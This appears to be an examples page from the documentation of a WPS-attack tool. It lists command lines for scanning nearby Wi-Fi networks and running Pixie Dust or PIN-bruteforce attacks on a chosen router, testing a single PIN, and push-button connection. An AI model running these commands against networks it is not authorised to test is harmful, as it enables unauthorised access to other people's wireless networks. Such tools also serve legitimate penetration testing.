HomeTutorialArgumentsCommandsExamplesOutput Demo
GitHub Telegram

Sections

cd ..
Examples

Basic Attacks

Start here

Scan nearby networks, pick a target, and attack. The simplest entry point.

Scan + Pixie Dust

Scans all nearby WPS networks, lets you pick one, runs Pixie Dust automatically.

$sudo python main.py -i wlan0 -K
Scan + Bruteforce

Same scan flow but uses bruteforce attack instead.

$sudo python main.py -i wlan0 -B
Direct Pixie Dust

Skip scanning — run Pixie Dust directly on a known BSSID.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -K
Direct Bruteforce

Skip scanning — run bruteforce directly on a known BSSID.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -B
Manual PIN Test

Try a single specific WPS PIN without any automated attack.

$sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -p 12345670
Push Button Connect

Authenticate via the physical WPS button on the router.

$sudo python main.py -i wlan0 --pbc